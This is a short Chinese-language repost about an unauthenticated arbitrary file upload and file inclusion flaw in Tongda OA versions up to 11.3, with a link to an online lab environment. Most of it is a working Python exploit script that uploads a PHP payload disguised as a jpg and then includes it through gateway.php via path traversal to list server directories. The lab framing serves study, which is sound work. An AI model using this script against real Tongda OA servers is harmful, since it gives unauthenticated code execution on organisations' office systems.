通达OA v11.3 以下版本 任意文件上传加文件包含导致命令执行漏洞在线实验环境

转载自： 【通达OA <= v11.3 任意文件上传+文件包含导致命令执行漏洞利用】- https://store.vsplate.com/cn/post/519/

在线环境地址：https://www.vsplate.com/?github=%2Fbbvuln%2Ftdoa%2Ftree%2Fmaster%2F11.3%2Fdc&autogo=1

通达OA是由北京通达信科科技有限公司开发的一款办公系统，前一段时间通达官方在其官网发布了安全提醒与更新程序，并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件，之后通过精心构造的请求进行文件包含，实现远程命令执行，且攻击者无须登陆认证即可完成攻击。

漏洞利用脚本

脚本来自：

import requests
upload_url = "http://***.vsgo.cloud:7674/ispirit/im/upload.php"
exp_url = "http://***.vsgo.cloud:7674/ispirit/interface/gateway.php"
files = {'ATTACHMENT':('jpg','<?php $dir=isset($_GET["dir"])?$_GET["dir"]:".";var_dump(glob("$dir/*"));?>')}
data = {'P':123,'DEST_UID':'111','UPLOAD_MODE':1}
r = requests.post(upload_url,data=data,files=files)
file = r.json()['content']
filename = file.split("|")[0].split("_")[1]
path = file.split("|")[0].split("_")[0].split("@")[1]
exp_data = {"json":'{{"url":"../../ispirit/../../attach/im/{}/{}.jpg"}}'.format(path,filename)}
result = requests.post(exp_url,data=exp_data)
print(result.text)

利用成功将输出网站目录下的文件。